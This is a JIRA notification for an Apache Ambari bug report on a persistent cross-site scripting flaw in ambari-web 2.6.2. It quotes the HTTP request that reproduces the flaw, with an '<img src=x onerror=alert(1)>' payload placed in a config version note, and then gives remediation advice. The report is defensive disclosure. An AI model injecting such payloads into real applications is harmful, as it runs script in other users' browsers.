You are viewing a plain text version of this content. The canonical link for it is here.

Posted to issues@ambari.apache.org by "Andrii Tkach (JIRA)" <ji...@apache.org> on 2019/05/27 08:00:00 UTC

[jira] [Assigned] (AMBARI-25287) Persistent Cross Site Scripting (XSS) in Ambari

     [ https://issues.apache.org/jira/browse/AMBARI-25287?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Andrii Tkach reassigned AMBARI-25287:
-------------------------------------

    Assignee: Andrii Tkach

> Persistent Cross Site Scripting (XSS) in Ambari
> -----------------------------------------------
>
>                 Key: AMBARI-25287
>                 URL: https://issues.apache.org/jira/browse/AMBARI-25287
>             Project: Ambari
>          Issue Type: Bug
>          Components: ambari-web
>    Affects Versions: 2.6.2
>            Reporter: Andrii Tkach
>            Assignee: Andrii Tkach
>            Priority: Critical
>
> Below is the HTTP Request and Response issued when a user submits a note containing a JavaScript
> after modifying some configuration in "Tez" service.
> HTTP Request:
> PUT /api/v1/clusters/<env> HTTP/1.1
> Host: xyz601:8080
> Content-Length: 199
> Accept: application/json, text/javascript, /; q=0.01
> Origin: http://xyz601:8080
> X-Requested-With: XMLHttpRequest
> X-Requested-By: X-Requested-By
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
> like Gecko) Chrome/70.0.3538.102 Safari/537.36
> Content-Type: application/x-www-form-urlencoded; charset=UTF-8
> Referer: http://xyz:8080/
> Accept-Encoding: gzip, deflate
> Accept-Language: en-US,en;q=0.9
> Cookie: AMBARISESSIONID=vfiy4336mxwl1k5ehd6jrz43i
> Connection: close
> {"Clusters":{"desired_service_config_versions":
> {"service_config_version":4,"service_name":"TEZ","service_config_version_note":"Creat ed from service config version V4\n<img src=x onerror=alert(1)>"}
> }}
> Remediation Recommendations
> Restrict all input passed to the application to valid, whitelisted content, and ensure that all
> response/output sent by the server is HTML/URL/JavaScript encoded, depending on the context in
> which the data is used by the application.
> The remediation should not attempt to blacklist content and remove, filter, or sanitize it. There are
> too many types of encoding it to get around filters for such content.
> We strongly recommend a positive security policy that specifies what is allowed.
> Negative or attack signature based policies are difficult to maintain and are likely to be incomplete.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)